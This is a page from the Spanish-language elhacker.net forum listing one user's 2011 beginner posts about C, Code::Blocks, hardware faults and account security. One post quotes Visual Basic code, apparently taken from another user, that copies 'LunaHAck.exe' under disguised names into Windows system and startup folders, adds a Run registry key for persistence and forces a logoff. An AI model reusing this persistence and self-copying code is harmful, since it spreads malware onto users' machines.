elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Temas
Páginas: 1 2 3 4 [5] 6 7 8
41  Foros Generales / Dudas Generales / Protecion para registro ?[Solucionado] en: 26 Julio 2011, 08:04 am
No abra un programa por acá o por ahí  :xD que sirva para blockear el registro de windows, osea que nada pueda modificar nada del registro sin que ante aparezca un cartel o advertencia en la pantalla diciendo que dichos programas o aplicación obtendrá acceso al registro ?
42  Informática / Software / Duda de Programas en: 26 Julio 2011, 00:58 am
Un programas se puede trabajar en varios lenguajes o tiene que ser uno solo ?

Cuando digo trabajar en varios lenguajes no me refiero trabajarlo en el mismo entorno, puede ser que yo trabaje unos cuantos archivos en VB y otros en C como también otro en javas en distintos programas.

O tiene que ser todo el mismo ?
43  Informática / Hardware / Problema con teclado en: 25 Julio 2011, 01:50 am
alguien tiene idea de que le pasa ami teclado van varias veces que se le entra loquera, como cuando presiono una tecla escribe 2 tecla cuando presiono ctrl izquierdo me pone mi pc a hibernar, esto me esta quillando la vida porque este post me tomo mas de 3 minutos limpiando los errores.

44  Foros Generales / Dudas Generales / Que hay de beneficio? en: 24 Julio 2011, 20:05 pm
Que tiene de beneficio para alguien en robar contraseña y correo electrónicos ? para mi padecer no le veo nada importante a eso. y porque mucho se entereza en hacer eso ?

Porque digamos que alguien me roba mi correo de mi no obtendrá nada Si quiere robar mi cuenta de paypal eso es con otro pass muy diferente a la de hotmail lo mismo con los foros y demás cuentas, el que robara mi cuenta solo obtendría los mensaje que tengo en ellas y mis contactos que yo tengo copias de ellos y no es la gran cosa crear otra cuenta y pasarlo ahí otra vez, o hay algo de valor obtener una cuenta ajena de hotmail aparte de leer disparate de esa persona.

Pregunto por que van varias veces que me llega un aviso de hotmail diciéndome que mi pass a sido cambiado y que si yo quiero aceptar el cambio que presiones un link (obviamente no soy bobo si yo no he echo ese cambio no debo de presionarlo).
45  Foros Generales / Dudas Generales / Interface Grafica[Solucionado] en: 24 Julio 2011, 10:33 am
Bueno ya tengo varios días puyando el CodeBlocks mi duda es Donde esta la interfaces? osea como se hace la aplicaciones los botones presiona aquí presiona allí ? Lo único que estoy haciendo es editar mas nada :¬¬ y nada de diseño por ningún lado.
46  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / AV para cell en: 24 Julio 2011, 00:41 am
Bueno! tengo una duda lo cell pueden coger virus ?
47  Foros Generales / Dudas Generales / Se puede trabajar o no!!![Solucionado] en: 23 Julio 2011, 03:45 am
 :D Bueno como ya saben sigo estudiando y las dudas van saliendo, La cosa es que yo estoy aprendiendo C pero tengo proyectos de VB echo de otras gentes pero eso proyectos los comparo con lo que estoy aprendiendo de los libros de C, pero veo diferencias por ejemplo:

esto es un poco de code que cogí a la alza de un post de un usuario acá en VB.

Código
  1. Private Function Verificar_Existe(path) As Boolean
  2.  
  3.    If Len(Trim$(Dir$(path))) Then
  4.        Verificar_Existe = True
  5.        FileCopy "c:\LunaHAck.exe", "C:\WINDOWS\Cursores.exe"
  6.        FileCopy "c:\LunaHAck.exe", "C:\WINDOWS\Cursores\Cursors.exe"
  7.        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\WINDOWS\system32\System32help.exe"
  8.        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Codigo.exe"
  9.        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Copia.exe"
  10.        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\WINDOWS\system\Systemhelp.exe"
  11.        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio\Inico.exe"
  12.        FileCopy "C:\WINDOWS\Cursores.exe", "C:\Documents and Settings\All Users\Escritorio\LunaHAck.exe"
  13.        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio\Inico2.exe"
  14.        FileCopy "C:\WINDOWS\Cursores.exe", "C:\WINDOWS\Cursores\Cursors.exe"
  15.        End If
  16.  
  17. End Function
  18.  
  19.  
  20. Private Sub Form_Load()
  21. HoraLimite = "00:00:30"
  22. Timer1.Interval = 1000
  23. horafinal = Time + HoraLimite
  24. Shell "Shutdown -t 10 -l "
  25. Shell "reg add hklm\software\microsoft\windows\currentversion\run /v programa /t reg_sz /d C:\WINDOWS\Cursores.exe /f "
  26. Call Verificar_Existe("c:\LunaHAck.exe ")

Este de lo que estudio de C:

Código
  1. #include <stdio.h>
  2.  
  3. /* imprime la talba de Fahrenheit-Celsius
  4.      Para fahr = 0, 20, ..., 300 */
  5.  
  6. main ()
  7.  
  8. {
  9.    int fahr, celsius;
  10.    int lower, upper, step;
  11.  
  12.    lower = 0;    /* limite inferior de latabla de temperatura */
  13.    upper = 300;  /* limine superior */
  14.    step = 20;    /* tamañp dl incremiento */
  15.  
  16.    fahr = lower;
  17.    while (fahr < = upper) {
  18.        celsius = 5 * (fahr-32) / 9;
  19.        printf("%d\t%d\n", fahr, celsius) ;
  20.        fahr = fahr + step;
  21.    }
  22. }

Yo puedo notar un poco de diferencia entre ambos Como por ejemplo ( ; ) entonce mi duda para trabajar en VB tengo que aprender otro lenguaje ? porque por la razón que estudio C es para poder usar el VB.
48  Foros Generales / Foro Libre / Promedio o depende en: 23 Julio 2011, 01:43 am
Bueno tengo varias dudas en este caso plasmare 3.

1-Cual es el promedio de ganancia de un programador contratado por una compañía ?

2-Para una compañía contratar a un programador necesita del este titulación (universidad) o que sepa bien su trabajo y con varios curso de capacitaciones.

3-Un programador puede vivir independientemente ? ejemplo yo mismo puedo crear mis programas hablando en escala grande programas para usuarios o compañías de ventas digamos programas de contabilidad como el famoso "Monica".

Si se que la numero 3 es mas complicada de hacer toma bastante tiempo hacer un programa por cuenta propia, pero la ganancia es alta si el programa da su resultado.
49  Programación / Programación C/C++ / novato!! Nothing to be done [Solucionado] en: 22 Julio 2011, 20:24 pm
Saludo.

Estoy leyendo un libro de el lenguaje de programacion en C , mientra leia los primero capitulos me tope con esto:

Citar
#include <stdio.h>

/* imprime la talba de Fahrenheit-Celsius
     Para fahr = 0, 20, ..., 300 */

main ()

{
    int fahr, celsius;
   int lower, upper, step;

    lower = 0;    /* limite inferior de latabla de temperatura */
    upper = 300;  /* limine superior */
    step = 20;    /* tamañp dl incremiento */

    fahr = lower;
    while (fahr < = upper) {
        celsius = 5 * (fahr-32) / 9;
        printf("%d\t%d\n", fahr, celsius) ;
        fahr = fahr + step;
   }
}


Entonce cuando le doy a compilar me aparece en el registro de abajo del CODE::BLOCKS donde reporta los errores de compilación lo siguiente:

Citar
"matemática - Debug" uses an invalid compiler. Skipping...
Nothing to be done.

Alguna explicación o solución en esto?
50  Foros Generales / Dudas Generales / Viñeta?[Solucionado] en: 20 Julio 2011, 11:13 am
Como se coloca la viñeta ? he revisado la lista de ASCII mil veces pero no me funciona. estoy tratándolo de escribir en Code::Blocks pero no me funciona.







http://www.wilkinsonpc.com.co/free/articulos/codigo-ascii.html

Páginas: 1 2 3 4 [5] 6 7 8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines